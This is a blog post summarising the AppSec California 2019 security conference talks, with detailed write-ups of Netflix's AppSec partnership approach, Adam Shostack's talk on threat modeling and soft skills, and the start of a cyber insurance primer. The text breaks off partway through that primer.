What I Learned Watching All 44 AppSec Cali 2019 Talks

239 minute read

OWASP AppSec California is one of my favorite security conferences: the talks are great, attendees are friendly, and it takes place right next to the beach in Santa Monica. Not too shabby 😎

One problem I always have, though, is that there are some great talks on the schedule that I end up missing.

So this year I decided to go back and watch all 44 talks from last year’s con, AppSec Cali 2019, and write a detailed summary of their key points.

If I had realized how much time and effort this was going to be at the beginning I probably wouldn’t have done it, but by the time I realized that this endeavor would take hundreds of hours, I was already too deep into it to quit 😅

Attending AppSec Cali 2020
If you’re attending AppSec Cali this year come say hi! I’m giving a talk and would be happy to chat about all things security.

What’s in this Post

This post is structured as follows:

  • Stats: Some high level stats and trends- which talk categories were most popular? Which companies gave the most talks?
  • Overview of Talks: A quick rundown of every talk in a few lines each, so you can quickly skim them and find the talks that are most directly relevant to you.
  • Summaries: detailed summaries of each talk, grouped by category.

Note the navigation bar on the left hand side, which will enable you to quickly jump to any talk.

Feedback Welcomed!
If you’re one of the speakers and I’ve left out something important, please let me know! I’m happy to update this. Also, feel free to let me know about any spelling or grammar errors or broken links.

If you find DevSecOps / scaling really interesting, I’d love to chat about what you do at your company / any tips and tricks you’ve found useful. Hit me up on Twitter, LinkedIn, or email.

Stats

In total, AppSec Cali 2019 had 44 talks that were a combined ~31.5 hours of video.

Here are the talks grouped by the category that I believed was most fitting:

Stats: Talks by Category
Not too much of a surprise here: you’d expect defense (blue team) talks to be emphasized at an OWASP conference, as was web security.

We can also see that containers and Kubernetes were fairly popular topics (3).

Some things I found surprising were how many talks there were on threat modeling (4) and account security (4), and how there were only 3 primarily cloud security-focused talks. Perhaps the biggest surprise was that there were 3 talks on securing third-party code, with Slack discussing the steps they took to evaluate Slack bots and Salesforce discussing the review process on their AppExchange.

Stats: Talks by Company

Here we see Netflix crushing it: they had presence on a panel, gave one of the keynotes, and collectively had 3 other talks. And of these 5 talks, 3 made my top 10 list. Not too shabby 👍

In second place, we see Segment coming in strong!

Netflix, Segment, and Dropbox were on at least one panel, while the rest of the companies listed had separate talks.



Overview of Talks

For your ease of navigation, this section groups all of the talks by category, gives a high description of what they’re about, and provides a link to jump right to their summary.

Note: the talks in each category are listed in alphabetical order, not in my order of preference.

My Top 10 Talks

This section lists my top 10 favorite talks from AppSec Cali 2019 ❤️

It was incredibly difficult narrowing it down to just 10, as there were so many good talks. All of these talks were selected because they are information-dense with detailed, actionable insights. I guarantee you’ll learn something useful from them.

A​ Pragmatic Approach for Internal Security Partnerships
Scott Behrens, Senior AppSec Engineer, Netflix
Esha Kanekar, Senior Security Technical Program Manager, Netflix
How the Netflix AppSec team scales their security efforts via secure defaults, tooling, automation, and long term relationships with engineering teams.

A Seat at the Table
Adam Shostack, President, Shostack & Associates
By having a “seat at the table” during the early phases of software development, the security team can more effectively influence its design. Adam describes how security can earn its seat at the table by using the right tools, adapting to what’s needed by the current project, and the soft skills that will increase your likelihood of success.

Cyber Insurance: A Primer for Infosec
Nicole Becher, Director of Information Security & Risk Management, S&P Global Platts
A lovely jaunt through the history of the insurance industry, the insurance industry today (terminology you need to know, types of players), where cyber insurance is today and where it’s headed, example cyber insurance policies and what you need to look out for.

(in)Secure Development - Why some product teams are great and others aren’t…
Koen Hendrix, InfoSec Dev Manager, Riot Games
Koen describes analyzing the security maturity of Riot product teams, measuring that maturity’s impact quantitatively using bug bounty data, and discusses 1 lightweight prompt that can be added into the sprint planning process to prime developers about security.

Lessons Learned from the DevSecOps Trenches

Clint Gibler, Research Director, NCC Group

Dev Akhawe, Director of Security Engineering, Dropbox

Doug DePerry, Director of Product Security, Datadog

Divya Dwarakanath, Security Engineering Manager, Snap

John Heasman, Deputy CISO, DocuSign

Astha Singhal, AppSec Engineering Manager, Netflix

Learn how Netflix, Dropbox, Datadog, Snap, and DocuSign think about security. A masterclass in DevSecOps and modern AppSec best practices.

Netflix’s Layered Approach to Reducing Risk of Credential Compromise
Will Bengston, Senior Security Engineer, Netflix
Travis McPeak, Senior Security Engineer, Netflix
An overview of efforts Netflix has undertaken to scale their cloud security, including segmenting their environment, removing static keys, auto-least privilege of AWS permissions, extensive tooling for dev UX (e.g. using AWS credentials), anomaly detection, preventing AWS creds from being used off-instance, and some future plans.

Starting Strength for AppSec: What Mark Rippetoe can Teach You About Building AppSec Muscles
Fredrick “Flee” Lee, Head Of Information Security, Square
Excellent, practical and actionable guidance on building an AppSec program, from the fundamentals (code reviews, secure code training, threat modeling), to prioritizing your efforts, the appropriate use of automation, and common pitfalls to avoid.

The Call is Coming From Inside the House: Lessons in Securing Internal Apps
Hongyi Hu, Product Security Lead, Dropbox
A masterclass in the thought process behind and technical details of building scalable defenses; in this case, a proxy to protect heterogenous internal web applications.

Startup Security: Starting a Security Program at a Startup
Evan Johnson, Senior Security Engineer, Cloudflare
What it’s like being the first security hire at a startup, how to be successful (relationships, security culture, compromise and continuous improvement), what should inform your priorities, where to focus to make an immediate impact, and time sinks to avoid.

Working with Developers for Fun and Progress
Leif Dreizler, Senior AppSec Engineer, Segment
Resources that have influenced Segment’s security program (talks, books, and quotes), and practical, real-world tested advice on how to: build a security team and program, do effective security training, successfully implement a security vendor, and the value of temporarily embedding a security engineer in a dev team.

Account Security

Automated Account Takeover: The Rise of Single Request Attacks
Kevin Gosschalk, Founder and CEO, Arkose Labs
Defines “single request attacks,” describes challenges of preventing account takeovers, gives examples of the types of systems bots attack in the wild and how, and recommendations for preventing account takeovers.

Browser fingerprints for a more secure web
Julien Sobrier, Lead Security Product Owner, Salesforce
Ping Yan, Research Scientist, Salesforce
How Salesforce uses browser fingerprinting to protect users from having their accounts compromised. Their goal is to detect sessions being stolen, including by malware running on the same device as the victim (and thus has the same IP address).

Contact Center Authentication
Kelley Robinson, Dev Advocate, Account Security, Twilio
Kelley describes her experiences calling in to 30 different company’s call centers: what info they requested to authenticate her, what they did well, what they did poorly, and recommendations for designing more secure call center authentication protocols.

Leveraging Users’ Engagement to Improve Account Security
Amine Kamel, Head of Security, Pinterest
Pinterest describes how it protects users who have had their credentials leaked in third-party breaches using a combination of programmatic and user-driven actions.

Blue Team

CISO Panel: Baking Security Into the SDLC
Richard Greenberg, Global Board of Directors, OWASP
Coleen Coolidge, Head of Security, Segment
Martin Mazor, Senior VP and CISO, Entertainment Partners
Bruce Phillips, SVP & CISO, Williston Financial
Shyama Rose, Chief Information Security Officer, Avant
Five CISOs share their perspectives on baking security into the SDLC, DevSecOps, security testing (DAST/SAST/bug bounty/pen testing), security training and more.

It depends…
Kristen Pascale, Principal Techn. Program Manager, Dell EMC
Tania Ward, Consultant Program Manager, Dell
What a PSIRT team is, Dell’s PSIRT team’s workflow, common chalenges, and how PSIRT teams can work earlier in the SDLC with development teams to develop more secure applications.

On the Frontlines: Securing a Major Cryptocurrency Exchange
Neil Smithline, Security Architect, Circle
Neil provides an overview of cryptocurrencies and cryptocurrency exchanges, the attacks exchanges face at the application layer, on wallets, user accounts, and on the currencies themselves, as well as they defenses they’ve put in place to mitigate them.

The Art of Vulnerability Management
Alexandra Nassar, Senior Technical Program Manager, Medallia
Harshil Parikh, Director of Security, Medallia
How to create a positive vulnerability management culture and process that works for engineers and the security team.

Cloud Security

Cloud Forensics: Putting The Bits Back Together
Brandon Sherman, Cloud Security Tech Lead, Twilio
An experiment in AWS forensics (e.g. Does the EBS volume type or instance type matter when recovering data?), advice on chain of custody and cloud security best practices.

Detecting Credential Compromise in AWS
Will Bengston, Senior Security Engineer, Netflix
How to detect when your AWS instance credentials have been compromised and are used outside of your environment, and how to prevent them from being stolen in the first place.

Containers / Kubernetes

Authorization in the Micro Services World with Kubernetes, ISTIO and Open Policy Agent
Sitaraman Lakshminarayanan, Senior Security Architect, Pure Storage
The history of authz implementation approaches, the value of externalizing authz from code, authz in Kubernetes, and the power of using Open Policy Agent (OPA) for authz with Kubernetes and ISTIO.

Can Kubernetes Keep a Secret?
Omer Levi Hevroni, DevSecOps Engineer, Soluto
Omer describes his quest to find a secrets management solution that supports GitOps workflows, is Kubernetes native, and has strong security properties, which lead to the development of a new tool, Kamus.

How to Lose a Container in 10 Minutes
Sarah Young, Azure Security Architect, Microsoft
Container and Kubernetes best practices, insecure defaults to watch out for, and what happens when you do everything wrong and make your container or cluster publicly available on the Internet.

Keynotes

Fail, Learn, Fix
Bryan Payne, Director of Engineering, Product & Application Security, Netflix
A discussion of the history and evolution of the electrical, computer, and security industries, and how the way forward for security is a) sharing knowledge and failures and b) creating standard security patterns that devs can easily apply, raising the security bar at many companies, rather than improvements helping just one company.

How to Slay a Dragon
Adrienne Porter Felt, Chrome Engineer & Manager, Google
Solving hard security problems in the real world usually requires making tough tradeoffs. Adrienne gives 3 steps to tackle these hard problems and gives examples from her work on the Chrome security team, including site isolation, Chrome security indicators (HTTP/s padlock icons), and displaying URLs.

The Unabridged History of Application Security
Jim Manico, Founder, Manicode Security
Jim gives a fun and engaging history of computer security, including the history of security testing, OWASP projects, and XSS, important dates in AppSec, and the future of AppSec.

Misc

How to Start a Cyber War: Lessons from Brussels-EU Cyber Warfare Exercises
Christina Kubecka, CEO, HypaSec
Lessons learned from running EU diplomats through several realistic cyber warfare-type scenarios, and a fascinating discussion of the interactions between technology, computer security, economics, and geopolitics.

Securing Third-Party Code

Behind the Scenes: Securing In-House Execution of Unsafe Third-Party Executables
Mukul Khullar, Staff Security Engineer, LinkedIn
Best practices for securely running unsafe third-party executables: understand and profile the application, harden your application (input validation, examine magic bytes), secure the processing pipeline (sandboxing, secure network design).

Securing Third Party Applications at Scale
Ryan Flood, Manager of ProdSec, Salesforce
Prashanth Kannan, Product Security Engineer, Salesforce
The process, methodology, and tools Salesforce uses to secure third-party apps on its AppExchange.

Slack App Security: Securing your Workspaces from a Bot Uprising
Kelly Ann, Security Engineer, Slack
Nikki Brandt, Staff Security Engineer, Slack
An overview of the fundamental challenges in securing Slack apps and the App Directory, the steps Slack is taking now, and what Slack is planning to do in the future.

Security Tooling

BoMs Away - Why Everyone Should Have a BoM
Steve Springett, Senior Security Architect, ServiceNow
Steve describes the various use cases of a software bill-of-materials (BOM), including facilitating accurate vulnerability and other supply-chain risk analysis, and gives a demo of OWASP Dependency-Track, an open source supply chain component analysis platform.

Endpoint Finder: A static analysis tool to find web endpoints
Olivier Arteau, Desjardins
A new tool to extract endpoints defined in JavaScript by analyzing its Abstract Syntax Tree.

Pose a Threat: How Perceptual Analysis Helps Bug Hunters
Rob Ragan, Partner, Bishop Fox
Oscar Salazar, Managing Security Associate, Bishop Fox
How to get faster, more complete external attack surface coverage by automatically clustering exposed web apps by visual similarity.

The White Hat’s Advantage: Open-source OWASP tools to aid in penetration testing coverage
Vincent Hopson, Field Applications Engineer, CodeDx
How two OWASP tools can make penetration testers more effective and demos using them. Attack Surface Detector extracts web app routes using static analysis and Code Pulse instruments Java or .NET apps to show your testing coverage.

Usable Security Tooling - Creating Accessible Security Testing with ZAP
David Scrobonia, Security Engineer, Segment
An overview and demo of ZAP’s new heads-up display (HUD), an intuitive and awesome way to view OWASP ZAP info and use ZAP functionality from within your browser on the page you’re testing.

Threat Modeling

Game On! Adding Privacy to Threat Modeling
Adam Shostack, President, Shostack & Associates
Mark Vinkovits, Manager, AppSec, LogMeIn
Adam Shostack and Mark Vinkovits describe the Elevation of Privilege card game, built to make learning and doing threat modelling fun, and how it’s been extended to include privacy.

Offensive Threat Models Against the Supply Chain
Tony UcedaVelez, CEO, VerSprite
The economic and geopolitical impacts of supply chain attacks, a walkthrough of supply chain threat modeling from a manufacturer’s perspective, and tips and best practices in threat modeling your supply chain.

Threat Model Every Story: Practical Continuous Threat Modeling Work for Your Team
Izar Tarandach, Lead Product Security Architect, Autodesk
Attributes required by threat modelling approaches in order to succeed in Agile dev environments, how to build an organization that continuously threat models new stories, how to educate devs and raise security awareness, and PyTM, a tool that lets you express TMs via Python code and output data flow diagrams, sequence diagras, and reports.

Web Security

An Attacker’s View of Serverless and GraphQL Apps
Abhay Bhargav, CTO, we45
An overview of functions-as-a-service (FaaS) and GraphQL, relevant security considerations and attacks, and a number of demos.

Building Cloud-Native Security for Apps and APIs with NGINX
Stepan Ilyin, Co-founder, Wallarm
How NGINX modules and other tools can be combined to give you a nice dashboard of live malicious traffic, automatic alerts, block attacks and likely bots, and more.

Cache Me If You Can: Messing with Web Caching
Louis Dion-Marcil, Information Security Analyst, Mandiant
Three web cache related attacks are discussed in detail: cache deception, edge side includes, and cache poisoning.

Inducing Amnesia in Browsers: the Clear Site Data Header
Caleb Queern, Cyber Security Servicies Director, KPMG
Websites can use the new Clear-Site-Data HTTP header to control the data its users store in their browser.

Node.js and NPM Ecosystem: What are the Security Stakes?
Vladimir de Turckheim, Software Engineer, Sqreen
JavaScript vulnerability examples (SQLi, ReDoS, object injection), ecosystem attacks (e.g. ESLint backdoored), best practice recommendations.

Preventing Mobile App and API Abuse
Skip Hovsmith, Principal Engineer, CriticalBlue
An overview of the mobile and API security cat and mouse game (securely storing secrets, TLS, cert pinning, bypassing protections via decompiling apps and hooking key functionality, OAuth2, etc.), described through an example back and forth between a package delivery service company and an attacker-run website trying to exploit it.


Tired Rabbit

Phew, that was a lot. Let’s get into it!



My Top 10 Talks

A​ Pragmatic Approach for Internal Security Partnerships

Scott Behrens, Senior AppSec Engineer, Netflix
Esha Kanekar, Senior Security Technical Program Manager, Netflix
abstract slides video

How the Netflix AppSec team scales their security efforts via secure defaults, tooling, automation, and long term relationships with engineering teams.

Check Out This Talk
This is one of the best talks I’ve seen in the past few years on building a scalable, effective AppSec program that systematically raises a company’s security bar and reduces risk over time. Highly, highly recommended 💯

The Early Days of Security at Netflix

In the beginning, the Netflix AppSec team would pick a random application, find a bunch of bugs in it, write up a report, then kick it over the wall to the relevant engineering manager and ask them to fix it. Their reports had no strategic recommendation section, just a list of boilerplate recommendations/impact/description of vulns. Essentially, they were operating like an internal security consulting shop.

This approach was not effective - vulns often wouldn’t get fixed and the way they operated caused relationships with dev teams to be adversarial and transactional. They were failing to build long term relationships with product and application teams. They were focusing on fixing individual bugs rather than strategic security improvements.

Further, dev teams would receive “high priority” requests from different security teams within Netflix, which is frustrating, as it was unclear to them how to relatively prioritize the security asks and the amount of work was intractable.

Enabling Security via Internal Strategic Partnership

Now, the AppSec team aims to build strong, long term trust-based relationships with dev teams.

They work closely with app and product teams to assess their security posture and identify and document investment areas: strategic initiatives that may take a few quarters, not just give dev teams a list of vulns.

Security Paved Road

The Netflix AppSec team invests heavily in building a security paved road: a set of libraries, tools, and self-service applications that enable developers to be both more productive and more secure.

For example, the standard authentication library is not only hardened, but it also is easy to debug and use, has great logging and gives devs (and security) insight into who’s using their app, and in general enables better support of customers who are having issues, whether it’s security related or not.

As part of our Security Paved Road framework, we focus primarily on providing security assurances and less on vulns.

Tooling and Automation

The Netflix AppSec team uses tooling and automation in vuln identification and management as well as application inventory and risk classification.

This information give them valuable data and context, for example, to inform the conversation when they’re meeting with a dev team, as they’ll understand the app’s risk context, purpose, etc. and be able to make better recommendations.

Intuition and organizational context are still used though. They’re data informed, not solely data driven.

Netflix’s 5-Step Approach to Partnerships

Penguin Shortbread

1. Engagement identification

  • Identify areas of investment based on factors like enterprise risk, business criticality, sensitivity of data being handled, bug bounty submission volume, overall engineering impact on the Netflix ecosystem, etc.
  • Ensure that the application team is willing to partner.

2. Discovery meeting(s)

  • Basically a kick off and deep dive meeting with the app team.
  • What are some of their securiity concerns? What keeps them up at time?
  • Set context with stakeholders: we’re identifying a shared goal, not forcing them to a pre-chosen security bar.
  • Make sure security team’s understanding of the app built via automation aligns with what the dev team thinks.

3. Security review

  • Based on info collected via automation and meeting with the dev team, the security team now knows what security services should be performed on which app and part of their landscape.
    • You don’t need to pen test or do a deep threat model of every app. This process can be more holistic, sometimes over a set of apps rather than a specific one.
  • Work with other security teams to collect their security asks for the dev team. This full list of security asks are then priorized by the security team and consolidated into a single security initiatives document.

4. Alignment on the Security Initiatives Doc

  • Discuss the security initiatives document with the dev team to ensure there is alignment on the asks and their associated priorities.

5. On-going relationship management and sync-ups

  • After aligning on the security asks, the dev teams make the initiatives part of theiri roadmap.
  • The sync ups are the key to maintain the long term relationship with partnering teams. Meetings may be bi-weekly or monthly and the security point of contact may join their all-hands, quarterly meeting plans, etc.
  • These meetings are not just to track that the security initiatives are on the app team’s roadmap, but also to ask if they have any blockers, questions, or concerns the security team can help with.
  • What’s going on in their world? What new things are coming up?

Automation Overview

Before going through a case study of this partnership process, let’s quickly cover some of the tooling and automation that enables Netflix’s AppSec team to scale their efforts.

Application Risk Rating: Penguin Shortbread

Penguin Shortbread performs an automated risk calculation for various entities including:

  • Finding all apps that have running instances and are Internet accessible, by org.
  • Can see which apps are using security controls, like SSO, app-to-app mTLS and secrets storage, and if they’re filled the security questionnaire (Zoltar).
Penguin Shortbread

The allows the security team to walk into a meeting and celebrate the team’s wins, “Hey, it looks like all of your high risk apps are using SSO, that’s great. You could buy down your risk even further by implementing secret storage in these other apps.”

Application Risk Calculator

This gives a ballpark understandinig of which apps the security team should probably look at first, based on properties like: is it Internet facing? Does it have an old OS or AMI? Which parts of the security paved road is it using? How many running instances are there? Is it running in a compliance-related AWS account like PCI?

Application Risk Calculator

Vulnerability Scanning: Scumblr

Scumblr was originally discussed by Netflix at AppSec USA 2016 (video) and was open sourced. It has since been changed heavily for internal use, and in general is used to run small, lightweight security checks against code bases or simple queries against running instances.

Dirty Laundry

Security Guidance Questionnaire: Zoltar

Zoltar keeps track of the intended purpose for different apps and other aspects that are hard to capture automatically. As devs fill out the questionnaire, they’re given more tailored advice for the language and frameworks they’re using, enabling the dev team to focus on things that measurably buy down risk.

Crystal Ball

Case Study: Kicking Off a Partnership with the Content Engineering Team

Discovery Meeting Preparation: Understand Their World

The team they’re meeting with may have 100-150 apps. The security team uses automation to come to the meeting as informed as possible:

  • Risk scoring - Based on the data the apps handle, if they’re Internet facing, business criticality, etc.
  • Vulnerability history - From internal tools, bug bounty history, pen tests, etc.
  • Security guidance questionnaire - Questionnaire that the dev team fills out.

Discovery Meeting

The main point of meeting is to build trust and show that the security team has done their homework. Instead of coming in and asking for a bunch of info, the security team is able to leverage their tooling and automation to come in knowing a lot about the dev team’s context - their apps, the risk factors they face, and the likely high risk apps they should focus on. This builds a lot of rapport.

If app teams aren’t receptive, that’s OK, the security team will circle back later.

Security Review

Perform holistic threat modeling/security services
This is different than a normal securiity review, as 100-200 apps may be in scope. They threat model a team’s ecosystem, not just a single app. Because the security team is informed of the teamm’s apps annd risks, they can narrow the security help they provide and what they recommend in a customized way.

What controls can they use to buy down their biggest risks?

By investing in secure defaults and self-service tooling, the security team can focus on things that add more value by digging into the harder problems, rather than walking in and saying, “You need to use X library, you need to scan with Y tool,” etc.

Collect and prioritize context/asks from other Security Teams
So that the dev team doesn’t need to worry about the 6 - 12 security subteams. The various security teams align on which security asks they want the dev team to prioritize.

Document the security asks into a security initiatives doc
Put all of the asks and related useful meta info into a standalone doc for easier tracking.

Align on the Security Initiatives Doc

According to Esha, this step is the secret weapon that helps make the whole process so effective. The doc includes:

  • Executive Summary: Focuses on the good as well as the bad. Threats, paved road adoption, open vulns, and an overview on the strategic work they should kick off first to mitigate the most risk.
  • Partnership Details: Provides context on when the meetings will be as well as the dev point of contact.
  • Team Details: Summary of the team, what they do, who to reach out too, documentation/architecture diagrams, and a list of known applications/libraries.
  • Security Initiatives Matrix: A prioritized list of security work (from all security teams). They set a high level objective for each goal and define its impact to Netflix.
    • They’ll provide the specific steps to reach that goal and include the priority, description, owner, status, timeline for delivery, and an option for tracking the work in Jira.

During the meeting, security emphasizes what is the goal? It’s not just about fixing bugs, it’s about setting a long term strategic path to reduce risk.

Security Initiatives Doc
Example security initiatives document

On-going Syncs

During these syncs, the security team’s goals are to build trust and show value, as well as talk about upcoming work and projects the dev team has on their plate.

The security team member ensures work is getting prioritized quarter over quarter and helps the dev team get connected with the right team if they’re hitting roadblocks when working on the security asks.

Scaling Partnerships - Security Brain

Security brain is the customer facing version of all of the security tooling. It presents dev teams, in a single view, the risk automatically assigned to each app, the vulns currently open, and the most impactful security controls/best practices that should be implemented.

While other security tools present a broader variety of information and more detail, Security Brain is purposefully focused on just the biggest “need to know” items that dev teams should care about right now.

Security Brain

Risks With Our Security Approach

Netflix’s approach isn’t perfect:

  • There’s a heavy emphasis on the paved road, but not all apps use it, so they have limited visibility there.
  • The current automated risk scoring metrics are a bit arbitrary and could be improved.
  • They don’t yet have an easy way to push out notifications if there’s a new control they want existing partner teams to adopt.

Evolving AppSec at Netflix: In Progress

Asset Inventory

Asset Inventory provides a way to navigate and query relationships between disparate infrastructure data sources

This includes not just code artifacts, but AWS accounts, IAM, load balancer info, and anything else related to an app, as well ownership and team information.

The Netflix AppSec team is working on creating an authoritative application inventory, which will enable them to better measure security paved road adoption, improve their self-service model and validation of controls, and find where they don’t have visibility.

Asset Inventory

Prism

Prism builds on top of the asset inventory as a paved road measurement and validation risk scoring system. It will give them the ability to recommend, validate, and measure paved road adoption practices prioritized by application risks and needs.

Prism will enable the security team to quickly ask questions like, “OK, this team has some apps that acces PII. Do they have any apps without logging? Show me all of their apps written in Java.”

Benefits of Prism include:

  • Faster IR response and triage time (can determine who owns an app quicker)
  • More mature risk calculation and scoring
  • Assist in scaling partnerships by increasing self servicing

We’ve discovered that focusing on the controls that buy down risk with automation is a lot easier than finding bugs with automation. That’s where we’re putting our emphasis right now.

Future Plans

Over time the Netflix AppSec team wants to grow investment in Secure by Default (Paved Road) efforts, as they tend to be high leverage, high impact, and excellent for devs - devs get a lot of value for free.

Not all security controls can be automated, so making self-service security easier to use is also valuable.

Security partnerships will always be valuable, as there are aspects and context that secure defaults and self-service tooling will never be able to handle. As more of the security team’s job is handled by widespread baseline security control adoption and self-service tooling, they’ll be able to provide even more value in their partnerships.

Future Plans

Stats: This Approach Works

The Netflix AppSec team reviews all of the critical risk vulns they had over the past 3 years and this is what they found:

  • 20% could have lowered their risk to High if paved road authentication controls had been adopted.
  • 12% could have been prevented or detected with third-party vulnerability scanning (See Aladdin Almubayed’s BlackHat 2019 talk).
  • 32% would not have been found with automation or self-service, so security partnerships are an important tool to reduce risk.

They also found they used only 33% of their projected bug bounty spend, which they had set aside based on industry standards, so it appears that they are headed in the right direction.

Maturity Framework for Partnerships

Maturity Framework
Note that this is the maturity level of the security team’s partnership with the dev team, not the security maturity of the dev team

Quick Wins

Determine your application risk scoring model
How do you determine which apps are high vs low risk? Consider using factors like if they’re Internet facing, the sensitivity of the data they interact with, programming language used, and compliance requirements.

Identify teams/orgs to partner with
Consider policies and compliance requirements, business criticality, etc.

Create an application inventory
Automate as much of it as possible so that you’re not constantly maintaining it.

Then, leverage this info in kicking off partnership discussions, consolidate and prioritize the security asks for dev teams, and create an easy to read and track security initiatives doc.

During your ongoing syncs with teams, ask, “What can we do for you?” and “How can we help you?”

Key Takeaways

Use tooling and automation to make data informed (but not wholly driven) decisions. Leverage the understanding you have about the app team’s ecosystem, their world, historical challenges they’ve had, and your knowledge of the relevant business context.

Give dev teams a single security point of contact to make communicating with them and answering their questions easier and less frustrating for them. This in turn helps build a long term trust based relationship with the partnering teams.

A Seat at the Table

Adam Shostack, President, Shostack & Associates
abstract slides video

By having a “seat at the table” during the early phases of software development, the security team can more effectively influence its design. Adam describes how security can earn its seat at the table by using the right tools, adapting to what’s needed by the current project, and the soft skills that will increase your likelihood of success.

At a high level, there are two phases in software development.

First, there is fluid dialogue about an idea, where things are fluid, not fixed. Here we’re building prototypes and doing experiments, exploring approach ideas and their consequence, asking questions like “What if…” and “How about…”

As things get hammered out we move to discussion, where we’ve decided on many of the details so things are more fixed than fluid, we’ve committed to an idea, and are working towards production code.

A common challenge is that the security team is only involved in the discussion phase, after many important decisions have already been made, like the technologies in use, how the system will be architected, and how everything will fit together. At this point, any suggestions (or demands) from the security team to make significant changes to the tech used or overall architecture will be met with resistance, as these decisions have already been made and will set the project back.

Security needs a seat at the table, so we can provide input during the design phase.

But seating is limited at the table. There are already a number of parties there, like the QA team, IT, users, engineering, etc. Everyone wants a seat. However, studies have shown that as team sizes grow larger it becomes more difficult to build consensus and thus make progress, so there’s motivation to keep the table small.

Today, security often doesn’t get a place at the table. If all you ever say at planning meetings regardless of what is proposed, “That would be insecure” or “We’ll run a vuln scan / SAST / fuzzing,” then developers will think, “OK great, I know what security is going to say, so we don’t need them here in this meeting.”

Seat at the Table: ZAP SAST
Just like friends don’t let friends do meth, friends don’t let friends send developers 1,000 page SAST scan reports.

What’s Needed For A Seat At The Table?

  • Tools that work in dialogue - Tools need to work when things are fluid not fixed.
  • Consistency - The same problems or challenges should get the same solution recommendations. Too often developers will get different advice from different security people, which is confusing and makes it hard foir them to do their jobs effectively.
  • Soft skills! - At a small table, if someone doesn’t play well with others, they don’t get invited back.

Threat Modeling as a Design Toolkit

Structure Allows Consistency

Threat modeling can help us get a seat at the table, and aving a consistent structure and approach can make threat modeling much more successful.

Seat at the Table: 4 Questions
  • The threat model can be created in some design software or done informally on a whiteboard.
  • When discussing what can go wrong, frameworks like STRIDE and kill chains provide structure to the brainstorming so we’ll be able to answer the question in a consistent, repeatable way, and come to similar conclusions.
  • By discussing what we’re going to do about these threats, we can start planning the security controls, arcchitecture decisions, etc. before a single line of code is written, rather than trying to use duct tape later.
  • Reflect on the threat modeling process afterwards. Did we get value out of this? What do we keep doing? What should we do differently next time? Like your development processes, how your company threat models will evolve over time to best fit your company’s unique environment.

Threat Modeling Is A Big Tent

Like developing software, the process of threat modeling can vary significantly: it can be lightweight, agile, fast, and low effort, or big, complicated, and slow. Which one makes sense depends on the project you’re on. Similarly, there are also different tools and deliverables that can be involved.

Think of threat modeling as being composed of building blocks, like how a software service can be composed of many microservices. If you think that threat modeling can only be done one way, like it’s a big monolith that cannot be decomposed into smaller parts, then you’ll lose the value of being able to take advantage of the building blocks that fit with your team’s needs.

Soft Skills

Soft skills are crucial in security.

Seat at the Table: Security Cleaning Up After DevOps
While security people might like making jokes like this, this damages rapport with developers and doesn’t help us get our jobs done.

You might feel like soft skills feel “unnatural.” That’s OK, everything we do starts that way! When you first started programming, did writing code feel natural? Probably not. Soft skills, like anything, are skills we need to learn and practice, by doing them.

Here are a few critical soft skills.

Respect

Pay attention to the person speaking In meetings and informally during discussions. Don’t interrupt, read your email, or have side conversations. This conveys that you don’t value what the person is saying.

Pay attention to the people not speaking Are we giving everyone the opportunity to speak? Oftentimes there are people who are very vocal and loud who can drown out other people. Everyone has something to add, let their voice be heard.

Active Listening

Pay attention, and show that you’re listening with your body language and gestures. Let people finish what they’re saying, don’t just hear the first 10 words and then interrupt, telling them how their idea won’t work. One effective structure, that will feel unnatural at first is:

I hear you saying [reflect back what they told you]…

Assume Good Intent

No one is paid to make your life harder. Everyone is just trying to get their job done, whether it’s shipping new features, designing the product, marketing it, etc. Instead of thinking they’re dumb or uninformed, instead ask yourself:

What beliefs might they have that would lead them to act or feel this way?

Everyone’s behavior makes sense within the context of their beliefs.

Diversity

Adam believes diversity has intrinsic value, as it allows you to take advantage of all of the skills, aptitudes, knowledge, and backgrounds that can make your company successful.

However he’s found that you tend to make better progress with executives by making the business case for diversity. Rather than promoting diversity for its intrinsic value, instead make the argument that it will help the business, for example, by referencing studies that show that diverse teams are more effective, by having a more broadly representative team you can better connect with your diverse user base, and the types of behaviors and environments that support diversity (e.g. being welcoming and supportive), also make your team or company a more attractive place to work, making it easier to hire and retain top talent. Conversely, having a culture that drives non traditional candidates away is probably not an environment that people want to be in and will likely cause challenges when you need to interface with other teams in the company.

Questions

What do you do if your company had a bad event and it caused people to keep coming to the security team for help and it’s overwhelmed your team?

This is a great opportunity to train developers how to threat model so they can start to stand their own, looping in the security team in harder cases as needed.

How do we know if we did a “good job”?

There’s basically two types of metrics, mechanical and qualitative. For mechanical, you can ask measurable questions like, “Do we have a diagram? Did we find threats against this service? Did we file user stories or acceptance tests for each of the things we found?”

On the qualitative side, during retrospectives, you can ask questions like, “Are we happy with the time we spent on threat modeling? Do we feel it paid off well?”

How do you make the business case for giving developers more secure coding training?

Without secure coding training, developers are more likely to introduce vulnerabilities into the software they write. Once this code has been tested, delivered, and is in production, potentially with other components that rely on it, it’s very expensive to go back and fix it.

By having developers write secure software in the first place, you can limit the amount of rework that has to be done, which improves the predictability of shipping new features. You’re reducing the likelihood that you’ll discover new problems days, weeks, or months later and have to interrupt what you’re currently working on to fix them, at which time the developer who introduced the issue may have forgotten most of the relevant context.

Metrics can also be really valuable here. Track the number and types of vulnerabilities you’re discovering in various code bases so you can show that after the training, your SAST / DAST tools or pen tests are finding fewer issues, which is allowing you to spend more time building new features and less time fixing issues. See Data-Driven Bug Bounty for more ideas on leveraging vulnerability data to drive AppSec programs.

Cyber Insurance: A Primer for Infosec

Nicole Becher, Director of Information Security & Risk Management, S&P Global Platts
abstract slides video

This talk is a really fun and info-dense whirlwhind tour of cyber insurance. Frankly, there’s too much good content for me to cover here, so I’ll do my best at providing an overview of the content Nicole covers with a few of the key points.

Nicole gave this talk because the cyber insurance industry is growing rapidly and at some point, we in the infosec community are going to have to be involved, so she wants to describe the key terminology and context we need to be reasonably informed.

Insurance is a mechanism individuals or organications use to limit their exposure to risk. Individuals band together to form groups that pay for losses. By forming groups, the risk is spread and no individual is fully exposed.

Nicole gives a quick history of the insurance industry, from Hammurabi, medieval guilds, Pascal’s tables (which led to actuarial tables, underwriting, and affordable insurance) to Ben Franklin.

The insurance industry has evolved over time, based on new technology and risks; for example, fire insurance after the great fire of London, automobile insurance once cars became widespread, and now cyber insurance.

Insurance Industry Today

There are 3 major market participants:

  1. Brokers / Agents: Act as middlemen between the insurance buyer and the carrier. Must be licensed and regulated. They develop the sales infrastructure needed to sell insurance on behalf of the carrier.
